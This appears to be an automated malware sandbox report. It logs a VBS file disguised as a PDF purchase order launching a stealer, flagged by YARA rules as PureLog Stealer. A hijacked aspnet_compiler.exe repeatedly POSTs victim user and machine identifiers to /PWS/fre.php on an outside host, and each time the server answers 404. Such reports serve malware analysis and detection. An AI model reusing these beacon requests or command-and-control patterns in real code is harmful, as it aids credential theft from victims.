                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=InVjmQySneVwFIvcB%2BMKAzADbiRL3UqbqlRAOLUArt2Lk8vxhBbfocB5x7251NqQkPEPfxnfrYb3YJBM332ZxGXtbZqEPJcDKCdLFrCcHIJ2zdVD9yrTXmIDOQK34dAFRA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013b76e134c15-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                130192.168.2.649860172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:13.897342920 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:14.021501064 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:14.411401987 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:14 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ydm07zyz%2F9SecHwthypbxWJzD0NhDi%2BhqV6Y3y7guYLov0RPixGzpTOblWWuRmaMehytK14Bce45jceALt%2BMxFH086EZ2tFXgCWU0vBp2e%2BcdJ07w6tlORxWKwKlWwnfgA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013bc4f1d8da6-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                131192.168.2.649861172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:14.663983107 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:14.788913965 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:15.172118902 CEST609INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:15 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=js%2B3kSubVzQoLrNf9jMl6m9d5%2Bl9qUpPK9HAauQK%2FCp5wi%2FnFU7Zx4DWyDaNLXBsLevZOP6cClqiIp7HSfHVfrqRKGBmYA%2Fy3raJhMSQzz63MyBYNLpVlrgYy%2Fy4%2Fq4zww%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013c10ee102ed-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                132192.168.2.649862172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:15.463120937 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:15.586615086 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:15.951977015 CEST599INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:15 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BoQ8mn4yQZ8xuvVJPVHXrgjiI1Kc5z1yQX4TsUmShe4umxdCggYnVCjNAOUj3CfC4XZdUFyW4CdQf3HGHF8iQUGsec3pfNnoT9HUl0qO7tEqiaG%2FmOHFY5KfAP6lxOwSuQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013c60f5e31da-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                133192.168.2.649863172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:17.815577030 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:17.939762115 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:18.328830004 CEST601INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:18 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RepKrIlom55Ury5ShmjaPgwc58l61fbVjowvj48GpQ0JyfEJweHEqfmZHpLJNqg4hHfJBRupuGSi%2B1r719dD%2BM760fasd1M3Qa7axmSkv97RLz0JKSUP3m1qI%2BXliKFOZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013d4bb227477-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                134192.168.2.649864172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:18.590588093 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:18.716793060 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:19.106915951 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:19 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kiVr%2Bmu6p3qg8iYD06JAPTm6K81vYRbCMTOf8NZ8CDWzUuYmxAChkrNBs8jn3qgiLqmVPGXg1B93YtQTZe%2BBMaplO4Ilhn555zJWpLHaU1aJJ%2BwzeR%2F4G9dKD7nIeEFbGA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013d99e615c5f-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                135192.168.2.649865172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:19.370644093 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:19.495301008 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:19.871881962 CEST605INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:19 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fu9%2Fz0txcHfLZrS8TZNpgqQFUX%2BD%2BTaFhYWoraQEtTvcH7zfHONy1R83EEyR0Ifle%2FkhIYqo1OpefJDlReRvjGupOq3E0jJrF0k9QMKb7x%2BACvO1pea45423D9R2HgrdLA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013de7c9bb3d4-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                136192.168.2.649866172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:20.136719942 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:20.261132956 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:20.636603117 CEST605INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:20 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NDJQoLlFI139OnCbYIj8B3JbJHEiByhI%2BhT%2B01r8gyMYFehzfbUR6BLVS5q8TPVBlKdnJsO1F8FPTd0abZcgSDUB413SJIzO7%2BzhBB2wo5XrTtTj79%2F372sJbux5NC%2F1BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013e33808741e-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                137192.168.2.649867172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:20.907030106 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:21.031291008 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:21.399348974 CEST605INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:21 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5N9ZuxSo5ETztlAp8mlCNp4Ybpa%2Fuhc3lAHjXc7KKIuvL8%2FqmZqkf8qfQ5%2Fz84CJJetmhTOs%2FYhHZh9nHAeamVn%2BwkDAd1sV2VZNUEiASH5TqNAAyTskIhfk4VoT9dwTFw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013e81cfa6dad-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                138192.168.2.649868172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:21.669303894 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:21.794157028 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:22.172482014 CEST605INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:22 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rH5IKNnUHnByPE%2BNARCr3wPIOBqalodlIOchukprOydgmgF5oKtQm191Q4T3LgBd679fyk8QDe811q2WlR%2BVPMqrF%2Fro4AwXE3A1hgYra%2FrexvUSL4%2Bhpmgi25HZva14yQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013ecdd9c8da3-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                139192.168.2.649869172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:22.429105997 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:22.552946091 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:22.932873011 CEST599INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:22 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jnEq6ZldLDpSAR6XYw60JSAuccC7iwsTKhGa9cZtjOgdBlQ5zlFQ5MNU3LPqruMzwPFvJWAJxI%2FYMGbDq44LQfoyfQmv%2FVlL54QdKbQesUsCT3Opou56p6PmeDOU7mIIIg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013f19d3431e6-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                140192.168.2.649870172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:23.194950104 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:23.319766045 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:23.701543093 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:23 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O1c8ZWHOxB06v96hAqsl%2BSmXf%2FKJMlT%2FBxGKTj4bjA2GVREmkTQzidLNHKt68i%2B4OKPFW4MWG1IkYjxz2dmP2MvTpZNnM55VAPcIzbUDVSl63GNZnARqMHR2OyDbwhi4Pw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013f658ca8dc6-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                141192.168.2.649871172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:23.961991072 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:24.086267948 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:24.470716000 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:24 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ptkxQNQOtr9ciCgNB83eUiTr5xOm3WdMsRhTrFHpCSHS6OXhp1WjiOiB2SzVW17wDG1K4rgg2qRwn9cRYgdxNYS2%2Bi4o%2ByMMblrnc7lD5DStOcTF%2F%2FgJKGCfD22z8bC13w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013fb2e918dae-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                142192.168.2.649872172.67.148.12680
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:31:24.825006962 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:31:24.948584080 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:31:25.328350067 CEST595INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:31:25 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7fbFCgsAg4dSvBXbBxyxy2Qcq2C2v8J0yMPFh5jm5XfyD0NJqef9ZyFKJYA6XUeOnd4iwwuKUn6v6DtUfGfxjik2sRpqErL8ZKc23IpSIMl8lYDwVzSCaalt8N0zmVDCMg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870014008a646dce-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:09:29:15
                                                Start date:06/04/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs"
                                                Imagebase:0x7ff6bd020000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2257758604.000001A474030000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2249190359.000001A4732E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2249613824.000001A473A21000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2252966243.000001A4735D6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                Target ID:2
                                                Start time:09:29:19
                                                Start date:06/04/2024
                                                Path:C:\Users\user\AppData\Local\Temp\x.exe
